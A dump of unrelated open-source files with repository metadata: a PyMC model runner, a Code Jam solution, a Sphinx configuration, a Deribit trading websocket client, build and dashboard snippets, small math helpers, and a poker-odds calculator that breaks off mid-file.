cee79224828046ad207e51d9a47d49cf7fe50c1f | 21ebe23f27cced0b5f9fa01a350268eb19cf26bf | /run_radon_varying_intercept.py | 0e70ec6281244a497b924637b276188a01784289 | [] | no_license | joseffaghihi/pymc_radon | dfe7879dd03e56d756a4db96d4248e07c08c5240 | aeeb71f4c50f22b90bc2659e8f5841e2070c3c54 | refs/heads/master | 2021-01-15T09:24:24.291545 | 2011-03-08T18:19:19 | 2011-03-08T18:19:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | import pymc
import radon_varying_intercept
from pylab import hist, show
from pymc import Matplot
# Build and run the MCMC sampler over the varying-intercept radon model module.
M = pymc.MCMC(radon_varying_intercept)
# 50k iterations with 10k burn-in, keeping every 5th sample.
M.sample(iter=50e3, burn=10e3, thin=5)
fit = M.stats()
# Print the posterior mean of every tracked variable.
for k in fit.keys():
    print(k,fit[k]['mean'])
# Write trace/diagnostic plots for all variables.
Matplot.plot(M)
| [
"armstrong.whit@gmail.com"
] | armstrong.whit@gmail.com |
c553f3cf8e814068e3de80a5d5d74670c9a32497 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_212/62.py | 2e921c86f22c4e6edb1a0681c1da5040d943a43a | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 793 | py | import sys
import itertools
# Python 2 Code Jam solution. Reads T test cases from stdin; each case gives
# N and a modulus P on one line, then the N group sizes on the next.
sys.setrecursionlimit(10000000)
tc = int(sys.stdin.readline().strip())
for tmp_tc in xrange(tc):
    [ N, P ] = map(lambda x: int(x), sys.stdin.readline().strip().split(' '))
    gs = map(lambda x: int(x), sys.stdin.readline().strip().split(' '))
    # Only the residues of the group sizes mod P matter; count each class.
    cnts = [ 0 ] * P
    for g in gs:
        cnts[g % P] += 1
    cache = {}
    def dp(cfg, p):
        # Memoized search over serving orders. cfg = remaining count per
        # residue class (mutated in place and restored), p = running prefix
        # sum mod P. Appears to return the minimum number of groups served
        # while the running remainder is non-zero; the final answer is N
        # minus that minimum. (NOTE(review): confirm exact semantics.)
        if sum(cfg) == 0: return 0
        key = tuple(cfg), p
        if key in cache: return cache[key]
        res = None
        for idx, k in enumerate(cfg):
            if k == 0: continue
            cfg[idx] -= 1
            pp = (p + idx) % P
            tmp = dp(cfg, pp)
            if p: tmp += 1
            if res is None or res > tmp: res = tmp
            cfg[idx] += 1
        cache[key] = res
        return res
    res = len(gs) - dp(cnts, 0)
    print "Case #%d: %d" % (1+tmp_tc, res)
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
f5a3b71c6bff9673ba71eeecf036dd3089d9ae7c | 9eb09e374d6f1fea46844b8325e30f875b0813f3 | /conf.py | 9196537ce6bce033ae0fda957584b428d5b46b2a | [] | no_license | TuuuNya/sphinx_demo | ef6fdb896703f697b71904a8ec4ec0bf5ec9dc45 | 42808595f0581de552045ea3d97926b773c7bad1 | refs/heads/master | 2020-04-25T21:02:04.036206 | 2019-02-28T08:42:09 | 2019-02-28T08:42:09 | 173,068,405 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,284 | py | # -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'WebPocket'
copyright = '2019, TuuuNya'
author = 'TuuuNya'
# The short X.Y version
version = ''
# The full version, including alpha/beta/rc tags
release = 'https://github.com/TuuuNya/sphinx_demo'
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.githubpages',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = 'zh_CN'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = None
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'WebPocketdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'WebPocket.tex', 'WebPocket Documentation',
'TuuuNya', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'webpocket', 'WebPocket Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'WebPocket', 'WebPocket Documentation',
author, 'WebPocket', 'One line description of project.',
'Miscellaneous'),
]
# -- Options for Epub output -------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# -- Extension configuration -------------------------------------------------
| [
"song@secbox.cn"
] | song@secbox.cn |
73be991d92aa7d1f221c705467c3b65a83ab1b85 | c8faa6a4343a1b3775eb0cd707271f6c4aede6be | /quant/platform/deribit.py | 3d076c1c19b2afd753315af68b2af69209a0dfa9 | [
"MIT"
] | permissive | 51bitquant/thenextquant | adada6c2b88723971413f12df23505bd250c86d0 | b0b9d60439a916bc4b1980f908f648aa863d5918 | refs/heads/master | 2023-05-29T21:23:18.198952 | 2023-05-14T08:42:56 | 2023-05-14T08:42:56 | 640,403,755 | 6 | 2 | null | 2023-05-14T01:06:46 | 2023-05-14T01:06:45 | null | UTF-8 | Python | false | false | 13,662 | py | # -*- coding:utf-8 -*-
"""
Deribit Trade module 交易模块
https://docs.deribit.com/v2/
Author: HuangTao
Date: 2019/04/20
"""
import json
import copy
import asyncio
from quant.utils import logger
from quant.const import DERIBIT
from quant.position import Position
from quant.utils.websocket import Websocket
from quant.tasks import LoopRunTask, SingleTask
from quant.utils.decorator import async_method_locker
from quant.order import Order
from quant.order import ORDER_ACTION_BUY, ORDER_ACTION_SELL
from quant.order import ORDER_TYPE_LIMIT, ORDER_TYPE_MARKET
from quant.order import ORDER_STATUS_SUBMITTED, ORDER_STATUS_PARTIAL_FILLED, ORDER_STATUS_FILLED, \
ORDER_STATUS_CANCELED, ORDER_STATUS_FAILED
from quant.order import TRADE_TYPE_BUY_OPEN, TRADE_TYPE_SELL_OPEN, TRADE_TYPE_SELL_CLOSE, TRADE_TYPE_BUY_CLOSE
class DeribitTrade(Websocket):
""" Deribit Trade module 交易模块
"""
    def __init__(self, account, strategy, symbol, host=None, wss=None, access_key=None, secret_key=None,
                 order_update_callback=None, position_update_callback=None):
        """ Initialize.
        @param account account name
        @param strategy strategy name
        @param symbol trading pair (contract name)
        @param host HTTP request host address
        @param wss websocket connection address
        @param access_key ACCESS KEY
        @param secret_key SECRET KEY
        @param order_update_callback callback invoked on order updates
        @param position_update_callback callback invoked on position updates
        """
        self._account = account
        self._strategy = strategy
        self._platform = DERIBIT
        self._symbol = symbol
        self._host = host if host else "https://www.deribit.com"
        self._wss = wss if wss else "wss://deribit.com/ws/api/v2"
        self._access_key = access_key
        self._secret_key = secret_key
        self._order_update_callback = order_update_callback
        self._position_update_callback = position_update_callback
        self._order_channel = "user.orders.{symbol}.raw".format(symbol=symbol)  # order subscription channel
        super(DeribitTrade, self).__init__(self._wss, send_hb_interval=5)
        self._orders = {}  # order cache
        self._position = Position(self._platform, self._account, strategy, symbol)  # current position
        self._query_id = 0  # message sequence id, uniquely identifies each request
        self._queries = {}  # outstanding post requests {"request_id": future}
        self.initialize()
        # register periodic tasks
        LoopRunTask.register(self._do_auth, 60 * 60)  # re-authenticate every hour
        LoopRunTask.register(self._check_position_update, 1)  # poll the position every second
        self._ok = False  # True once an authorized websocket connection is established
    @property
    def position(self):
        # Shallow copy so callers cannot mutate the internal position object.
        return copy.copy(self._position)
    @property
    def orders(self):
        # Shallow copy so callers cannot mutate the internal order cache.
        return copy.copy(self._orders)
    async def connected_callback(self):
        """ After the connection is established: authenticate, then fetch open
        orders and the current position, and subscribe to the order channel.
        """
        # authenticate
        success, error = await self._do_auth()
        if error:
            return
        if success.get("access_token"):
            self._ok = True
        else:
            return
        # fetch orders that are not yet fully filled
        success, error = await self.get_open_orders()
        if error:
            return
        for order_info in success:
            order = self._update_order(order_info)
            if self._order_update_callback:
                SingleTask.run(self._order_update_callback, order)
        # fetch the current position
        await self._check_position_update()
        # once authorization succeeded, subscribe to data channels
        method = "private/subscribe"
        params = {
            "channels": [
                self._order_channel
            ]
        }
        await self._send_message(method, params)
async def _do_auth(self, *args, **kwargs):
""" 鉴权
"""
method = "public/auth"
params = {
"grant_type": "client_credentials",
"client_id": self._access_key,
"client_secret": self._secret_key
}
success, error = await self._send_message(method, params)
return success, error
async def get_server_time(self):
""" 获取服务器时间
"""
method = "public/get_time"
params = {}
success, error = await self._send_message(method, params)
return success, error
async def get_position(self):
""" 获取当前持仓
"""
method = "private/get_position"
params = {"instrument_name": self._symbol}
success, error = await self._send_message(method, params)
return success, error
async def create_order(self, action, price, quantity, order_type=ORDER_TYPE_LIMIT):
""" 创建订单
@param action 委托方向 BUY SELL
@param price 委托价格
@param quantity 委托数量
@param order_type 委托类型 limit/market
"""
if int(quantity) > 0:
if action == ORDER_ACTION_BUY:
trade_type = TRADE_TYPE_BUY_OPEN
else:
trade_type = TRADE_TYPE_SELL_CLOSE
else:
if action == ORDER_ACTION_BUY:
trade_type = TRADE_TYPE_BUY_CLOSE
else:
trade_type = TRADE_TYPE_SELL_OPEN
quantity = abs(int(quantity))
if action == ORDER_ACTION_BUY:
method = "private/buy"
elif action == ORDER_ACTION_SELL:
method = "private/sell"
else:
logger.error("action error! action:", action, caller=self)
return None
if order_type == ORDER_TYPE_LIMIT:
type_ = "limit"
else:
type_ = "market"
params = {
"instrument_name": self._symbol,
"price": price,
"amount": quantity,
"type": type_,
"label": str(trade_type)
}
success, error = await self._send_message(method, params)
if error:
return None, error
order_no = success["order"]["order_id"]
return order_no, None
async def revoke_order(self, *order_nos):
""" 撤销订单
@param order_nos 订单号,如果没有指定订单号,那么撤销所有订单
* NOTE: 单次调换最多只能撤销100个订单,如果订单超过100个,请多次调用
"""
# 如果传入order_nos为空,即撤销全部委托单
if len(order_nos) == 0:
method = "private/cancel_all_by_instrument"
params = {"instrument_name": self._symbol}
success, error = await self._send_message(method, params)
if error:
return False, error
else:
return True, None
# 如果传入order_nos为一个委托单号,那么只撤销一个委托单
if len(order_nos) == 1:
method = "private/cancel"
params = {"order_id": order_nos[0]}
success, error = await self._send_message(method, params)
if error:
return order_nos[0], error
else:
return order_nos[0], None
# 如果传入order_nos数量大于1,那么就批量撤销传入的委托单
if len(order_nos) > 1:
success, error = [], []
method = "private/cancel"
for order_no in order_nos:
params = {"order_id": order_no}
r, e = await self._send_message(method, params)
if e:
error.append((order_no, e))
else:
success.append(order_no)
return success, error
async def get_order_status(self, order_no):
""" 获取订单状态
@param order_no 订单号
"""
method = "private/get_order_state"
params = {"order_id": order_no}
success, error = await self._send_message(method, params)
return success, error
async def get_open_orders(self):
""" 获取未完全成交订单
"""
method = "private/get_open_orders_by_instrument"
params = {"instrument_name": self._symbol}
success, error = await self._send_message(method, params)
return success, error
async def get_open_order_nos(self):
""" 获取未完全成交订单号列表
"""
method = "private/get_open_orders_by_instrument"
params = {"instrument_name": self._symbol}
success, error = await self._send_message(method, params)
if error:
return None, error
else:
order_nos = []
for item in success:
order_nos.append(item["order_id"])
return order_nos, None
async def _send_message(self, method, params):
""" 发送消息
"""
f = asyncio.futures.Future()
request_id = await self._generate_query_id()
self._queries[request_id] = f
data = {
"jsonrpc": "2.0",
"id": request_id,
"method": method,
"params": params
}
await self.ws.send_json(data)
logger.debug("send message:", data, caller=self)
success, error = await f
if error:
logger.error("data:", data, "error:", error, caller=self)
return success, error
@async_method_locker("generate_query_id.locker")
async def _generate_query_id(self):
""" 生成query id,加锁,确保每个请求id唯一
"""
self._query_id += 1
return self._query_id
@async_method_locker("process.locker")
async def process(self, msg):
""" 处理websocket消息
"""
logger.debug("msg:", json.dumps(msg), caller=self)
# 请求消息
request_id = msg.get("id")
if request_id:
f = self._queries.pop(request_id)
if f.done():
return
success = msg.get("result")
error = msg.get("error")
f.set_result((success, error))
# 推送订阅消息
if msg.get("method") == "subscription":
if msg["params"]["channel"] == self._order_channel:
order_info = msg["params"]["data"]
order = self._update_order(order_info)
if self._order_update_callback:
SingleTask.run(self._order_update_callback, copy.copy(order))
async def _check_position_update(self, *args, **kwargs):
""" 定时获取持仓
"""
if not self._ok:
return
update = False
success, error = await self.get_position()
if error:
return
if not self._position.utime: # 如果持仓还没有被初始化,那么初始化之后推送一次
update = True
self._position.update()
size = int(success["size"])
average_price = float(success["average_price"])
liquid_price = float(success["estimated_liquidation_price"])
if size > 0:
if self._position.long_quantity != size:
update = True
self._position.update(0, 0, size, average_price, liquid_price)
elif size < 0:
if self._position.short_quantity != abs(size):
update = True
self._position.update(abs(size), average_price, 0, 0, liquid_price)
elif size == 0:
if self._position.long_quantity != 0 or self._position.short_quantity != 0:
update = True
self._position.update()
if update:
await self._position_update_callback(self._position)
def _update_order(self, order_info):
""" 更新订单信息
@param order_info 订单信息
"""
order_no = order_info["order_id"]
quantity = int(order_info["amount"])
filled_amount = int(order_info["filled_amount"])
remain = quantity - filled_amount
average_price = order_info.get("average_price")
state = order_info["order_state"]
if state == "open":
status = ORDER_STATUS_SUBMITTED
if filled_amount > 0:
status = ORDER_STATUS_PARTIAL_FILLED
elif state == "filled":
status = ORDER_STATUS_FILLED
elif state == "cancelled":
status = ORDER_STATUS_CANCELED
else:
status = ORDER_STATUS_FAILED
order = self._orders.get(order_no)
if not order:
action = ORDER_ACTION_BUY if order_info["direction"] == "buy" else ORDER_ACTION_SELL
trade_type = int(order_info.get("label"))
info = {
"platform": self._platform,
"account": self._account,
"strategy": self._strategy,
"symbol": self._symbol,
"order_no": order_no,
"action": action,
"price": order_info["price"],
"quantity": quantity,
"remain": remain,
"trade_type": trade_type
}
order = Order(**info)
self._orders[order_no] = order
order.status = status
order.remain = remain
order.avg_price = average_price
order.ctime = order_info["creation_timestamp"]
order.utime = order_info["last_update_timestamp"]
if order.status in [ORDER_STATUS_FILLED, ORDER_STATUS_CANCELED, ORDER_STATUS_FAILED]:
self._orders.pop(order.order_no)
return order
| [
"huangtao@ifclover.com"
] | huangtao@ifclover.com |
bee3b42d7296eade936964032ad2370f89b807d1 | cb3b8fda8f03642e50fa5bc84438a594128930a2 | /src/lgpl/SConscript | 2bb90c23349d315937aee4e34fee58e8ba3b6e4c | [
"ISC"
] | permissive | OuluLinux/pedigree | fbb83055d0afd1e620f48d8cfd89a2bf88235701 | 4f02647d8237cc19cff3c20584c0fdd27b14a7d4 | refs/heads/master | 2022-12-28T15:49:01.918113 | 2013-05-25T02:20:01 | 2013-05-25T02:20:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 351 | ####################################
# SCons build system for Pedigree
## Tyler Kennedy (AKA Linuxhq AKA TkTech)
####################################
import os
import shutil
Import(['env'])
# To include a new subdirectory just add to the list.
subdirs = ['SDL-1.2.14']
SConscript([os.path.join(i, 'SConscript') for i in subdirs],exports = ['env'])
| [
"matthew@theiselins.net"
] | matthew@theiselins.net | |
b945efe586fc69a6bd39e654fb0ea895ace5cc29 | fc79f39e32bcb97e2c47ab7fb820098e388cd55c | /Listas.py | 781e3d0da36bf9ab433957a5fe4124ef70b915ae | [] | no_license | EdwardAlvarado/Clase1 | 859f84ca4bc4e9b4ef4f190e6d792a2a85d94ffa | 1f167cd3afbaa5fce21af79d0c7053837307036e | refs/heads/master | 2020-06-18T00:50:01.685152 | 2019-07-16T02:52:10 | 2019-07-16T02:52:10 | 196,114,093 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 94 | py | valores = range(100)
print valores
m = 0
for i in valores:
m=i**2
print m
| [
"noreply@github.com"
] | EdwardAlvarado.noreply@github.com |
b2fc4e3cfd43f94cd2d66299af2e1b8145681be7 | fea4402f50b7a340db6122bf900243ada95018d4 | /src/password_manager/panel.py | 95422dcff8e5867e452ed91b6ffda710644ee538 | [] | no_license | CloudPadovana/openstack-security-integrations | ae516c5e7b15cee50fd01da3d69f66bfb26dde10 | fc22a9930aecc466d7b29af4095fbe922962077a | refs/heads/master | 2023-08-08T09:51:30.659062 | 2023-07-28T10:00:28 | 2023-07-28T10:00:28 | 14,750,978 | 0 | 2 | null | 2017-11-17T14:29:47 | 2013-11-27T15:31:37 | Python | UTF-8 | Python | false | false | 936 | py | # Copyright (c) 2014 INFN - "Istituto Nazionale di Fisica Nucleare" - Italy
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import gettext_lazy as _
import horizon
from openstack_dashboard.dashboards.settings import dashboard
class PasswordPanel(horizon.Panel):
name = _("Manage Password")
slug = 'password_manager'
dashboard.Settings.register(PasswordPanel)
| [
"paolo.andreetto@pd.infn.it"
] | paolo.andreetto@pd.infn.it |
b068a3f92381280a3c6a6e752cc92bdfb5747bba | 1542ec5349d8be375cb7b2aa0b9b894982831448 | /gui/qt/fee_slider.py | dffff5c4bc727cf8b1e8b003a8cf7f1a86740365 | [
"MIT"
] | permissive | NeblioTeam/electrum-nebl | 31edf95e30e914d7e04c0298842b33a6408fc4e5 | a22a5dbeec15b93e24aefd974e5bb896a1d96a5f | refs/heads/master | 2022-11-14T13:57:25.623247 | 2020-07-15T15:11:13 | 2020-07-15T15:11:13 | 110,052,588 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,018 | py | from electrum_nebl.i18n import _
import PyQt4
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import PyQt4.QtCore as QtCore
import threading
class FeeSlider(QSlider):
def __init__(self, window, config, callback):
QSlider.__init__(self, Qt.Horizontal)
self.config = config
self.window = window
self.callback = callback
self.dyn = False
self.lock = threading.RLock()
self.update()
self.valueChanged.connect(self.moved)
def moved(self, pos):
with self.lock:
fee_rate = self.config.dynfee(pos) if self.dyn else pos * self.fee_step
tooltip = self.get_tooltip(pos, fee_rate)
QToolTip.showText(QCursor.pos(), tooltip, self)
self.setToolTip(tooltip)
self.callback(self.dyn, pos, fee_rate)
def get_tooltip(self, pos, fee_rate):
from electrum_nebl.util import fee_levels
rate_str = self.window.format_amount(fee_rate) + ' ' + self.window.base_unit() + '/kB'
if self.dyn:
tooltip = fee_levels[pos] + '\n' + rate_str
else:
tooltip = 'Fixed rate: ' + rate_str
if self.config.has_fee_estimates():
i = self.config.reverse_dynfee(fee_rate)
tooltip += '\n' + (_('Low fee') if i < 0 else 'Within %d blocks'%i)
return tooltip
def update(self):
with self.lock:
self.dyn = self.config.is_dynfee()
if self.dyn:
pos = self.config.get('fee_level', 2)
fee_rate = self.config.dynfee(pos)
self.setRange(0, 4)
self.setValue(pos)
else:
self.fee_step = self.config.max_fee_rate() / 10
fee_rate = self.config.fee_per_kb()
pos = min(fee_rate / self.fee_step, 10)
self.setRange(1, 10)
self.setValue(pos)
tooltip = self.get_tooltip(pos, fee_rate)
self.setToolTip(tooltip)
| [
"neblioteam@gmail.com"
] | neblioteam@gmail.com |
ed97e8811b6301d5bad032acec68d9d059cf10d8 | 999312fc8102f952d4da618914b0b8b97a899667 | /src/data_utils.py | 002368fbd919bafa236558ac5567328fe5fefbfd | [] | no_license | adregan/APImachine | 60d140bbdd8b39f2b90779277a69bf6c32bd036c | e4d62ed3b9ed24b64d6fdf0599377b20ea384abe | refs/heads/master | 2020-05-29T23:10:53.143361 | 2015-03-24T04:17:19 | 2015-03-24T04:17:19 | 31,473,511 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 75 | py | def convert_id(entry):
entry['id'] = str(entry['id'])
return entry
| [
"duncanregan@gmail.com"
] | duncanregan@gmail.com |
d6177edf3e386fe4a31432ae43201ef687f67376 | 938e0e6ea9b5ed59f1cd0243cf2f3f9bed061c32 | /src/main.py | c3537c3ac81967b6af66c7419fdea85ac82d359f | [] | no_license | KristianAsp/WordTreeExercise | 57393eaee3312e472bc92bab8b0ff59e55fb1457 | 5b8bbb5095ab1fb0169f3ca8390af75f0cae4b83 | refs/heads/master | 2020-09-30T06:53:31.118112 | 2019-12-11T22:26:28 | 2019-12-11T22:26:28 | 227,233,106 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 791 | py | from src.WordTree import WordTree
t = WordTree()
t.add("car"); t.add("can"); t.add("cat"); t.add("cat"); t.add("cat")
print("1: ",t.count("ca"),t.count("can"),t.count("car"),t.count("cat"),t.minst())
print(t, t.size)
# t.remove("")
print(t, t.size)
t.add("")
print(t, t.size)
t.add("ca")
print("2: ",t.count("ca"),t.count("can"),t.count("car"),t.count("cat"),t.minst())
print(t, t.size)
# t.remove("car")
# print("3: ",t.count("ca"),t.count("can"),t.count("car"),t.count("cat"),t.minst()) print(t, t.size)
# t.remove("cat"); t.remove("cat"); t.remove("cat")
# print("4: ",t.count("ca"),t.count("can"),t.count("car"),t.count("cat"),t.minst()) print(t, t.size)
# t.remove("ca"); t.add("car")
# print("5: ",t.count("ca"),t.count("can"),t.count("car"),t.count("cat"),t.minst()) print(t, t.size) | [
"kristian.aspevik@gmail.com"
] | kristian.aspevik@gmail.com |
dc0bd4f2663604ec7cd4633cec7f0b91e328e640 | 8ee20b9758f34b1dfcf5a823f5f8f0c7e96e12c4 | /basic.py | f40a52098a5e2e876b36f05f25d1a4b928db41b4 | [] | no_license | Ashwin-Dhakal/learning-machine-learning | d749850e361408ae2173801167b1ace82a766f42 | 0d7400a3f1710fd5827c8499d7e65aff3296a777 | refs/heads/master | 2021-05-05T11:32:43.685193 | 2018-02-10T11:46:43 | 2018-02-10T11:46:43 | 118,204,808 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 471 | py | import pandas as pd
import quandl
df= quandl.get('WIKI/GOOGL')
df= df[['Adj. Open','Adj. Close','Adj. Low','Adj. High', 'Adj. Volume']]
df['HL_PCT']= (df['Adj. High'] - df['Adj. Close'])/df['Adj. Close']*100
df['percent_change'] = (df['Adj. Close']- df['Adj. Open'])/df['Adj. Open']*100
df= df[['Adj. Close', 'HL_PCT', 'percent_change', 'Adj. Volume', 'Adj. Open']]
print('this is the answer')
print(df.head()) #this prints all the column of the data provided to us
| [
"ashwindhakal97@gmail.com"
] | ashwindhakal97@gmail.com |
e2fbe9dfcab8909ac704f3fd6cc475c17abfa26e | 10b116a0e957089c80ef61efe447e132892742af | /matematicas.py | 745aca1dc5407acedfe87409730abc3150017212 | [] | no_license | apdaza/clase4 | 7b7b6a0fa081086daa8a87afc584432e0b213105 | 6c6340981f24d093dc1e3341cff3a562939ec5cd | refs/heads/master | 2020-05-18T10:38:17.917338 | 2019-05-01T02:09:03 | 2019-05-01T02:09:03 | 184,357,543 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 783 | py | def suma(a, b):
return a + b
def resta(a, b):
return a - b
def producto(a, b):
return a * b
def division(a, b):
return a / b
def factorial(n):
acum = 1
for i in range(1,n+1):
acum *= i
return acum
def factorial2(n):
if n == 0:
return 1
return n * factorial2(n-1)
def fibo(n):
if n in (1,2):
return 1
return fibo(n-1)+fibo(n-2)
def contar_sub(lista):
if lista == []:
return 0
return len(lista[0]) + contar_sub(lista[1:])
def suma_lista(lista):
if lista == []:
return 0
return lista[0] + suma_lista(lista[1:])
def suma_sublistas(lista):
if lista == []:
return 0
return suma_lista(lista[0]) + suma_sublistas(lista[1:])
| [
"noreply@github.com"
] | apdaza.noreply@github.com |
742b3474b402ecfb9f2c483f25434098751f9c93 | 43b13c066530348bd0eecaa4efd68f148ec8467a | /learnpython/projects/ex48/tests/lexicon_tests.py | fdb3d55cb374da841f38804a31f7784201923f7f | [] | no_license | NoJhonnie/Github | 0d9c4098de60f1bbc40041c8303a18ce5e825b20 | 9768d4aa1393008981d1bd818d4bec54fb25d5d2 | refs/heads/master | 2021-09-06T18:23:07.388778 | 2018-02-09T15:40:56 | 2018-02-09T15:40:56 | 112,492,924 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,645 | py | from nose.tools import *
from ex48 import lexicon
def test_directions():
assert_equal(lexicon.scan("north"), [('direction', 'north')])
result = lexicon.scan("north south east")
assert_equal(result, [('direction', 'north'),
('direction', 'south'),
('direction', 'east')])
def test_verbs():
assert_equal(lexicon.scan("go"), [('verb', 'go')])
result = lexicon.scan("go kill eat")
assert_equal(result, [('verb', 'go'),
('verb', 'kill'),
('verb', 'eat')])
def test_stops():
assert_equal(lexicon.scan("the"), [('stop', 'the')])
result = lexicon.scan("the in of")
assert_equal(result, [('stop', 'the'),
('stop', 'in'),
('stop', 'of')])
def test_nouns():
assert_equal(lexicon.scan("bear"), [('noun', 'bear')])
result = lexicon.scan("bear princess")
assert_equal(result, [('noun', 'bear'),
('noun', 'princess')])
def test_numbers():
assert_equal(lexicon.scan("1234"), [('number', 1234)])
result = lexicon.scan("3 91234")
assert_equal(result, [('number', 3),
('number', 91234)])
def test_errors():
assert_equal(lexicon.scan("ASDFGHJKL"), [('error', 'ASDFGHJKL')])
result = lexicon.scan("bear IAS princess")
assert_equal(result, [('noun', 'bear'),
('error', 'IAS'),
('noun', 'princess')]) | [
"smgjc123@163.com"
] | smgjc123@163.com |
383fd6ad815752f90385310887146c923428992e | 15c3fd316a6ba0fd0581e1ca3fc0bc526ee15957 | /holdem_calc.py | 1dd8b0e3acdf8ab9e712ab136f9adf182fe2b315 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | shakedzy/holdem_calc | 758ea845732ebb98df486617ea5bcf991771ae9a | 7e1b360fcd194734c49238dc873c70ee9e1672c3 | refs/heads/master | 2020-03-26T21:31:47.460144 | 2019-04-26T22:37:12 | 2019-04-26T22:37:12 | 145,393,300 | 0 | 1 | MIT | 2018-08-20T09:05:12 | 2018-08-20T09:05:12 | null | UTF-8 | Python | false | false | 3,570 | py | import time
import holdem_functions
import holdem_argparser
def main():
hole_cards, num, exact, board, file_name = holdem_argparser.parse_args()
run(hole_cards, num, exact, board, file_name, True)
def calculate(board, exact, num, input_file, hole_cards, verbose):
args = holdem_argparser.LibArgs(board, exact, num, input_file, hole_cards)
hole_cards, n, e, board, filename = holdem_argparser.parse_lib_args(args)
return run(hole_cards, n, e, board, filename, verbose)
def run(hole_cards, num, exact, board, file_name, verbose):
if file_name:
input_file = open(file_name, 'r')
for line in input_file:
if line is not None and len(line.strip()) == 0:
continue
hole_cards, board = holdem_argparser.parse_file_args(line)
deck = holdem_functions.generate_deck(hole_cards, board)
run_simulation(hole_cards, num, exact, board, deck, verbose)
print "-----------------------------------"
input_file.close()
else:
deck = holdem_functions.generate_deck(hole_cards, board)
return run_simulation(hole_cards, num, exact, board, deck, verbose)
def run_simulation(hole_cards, num, exact, given_board, deck, verbose):
num_players = len(hole_cards)
# Create results data structures which track results of comparisons
# 1) result_histograms: a list for each player that shows the number of
# times each type of poker hand (e.g. flush, straight) was gotten
# 2) winner_list: number of times each player wins the given round
# 3) result_list: list of the best possible poker hand for each pair of
# hole cards for a given board
result_histograms, winner_list = [], [0] * (num_players + 1)
for _ in xrange(num_players):
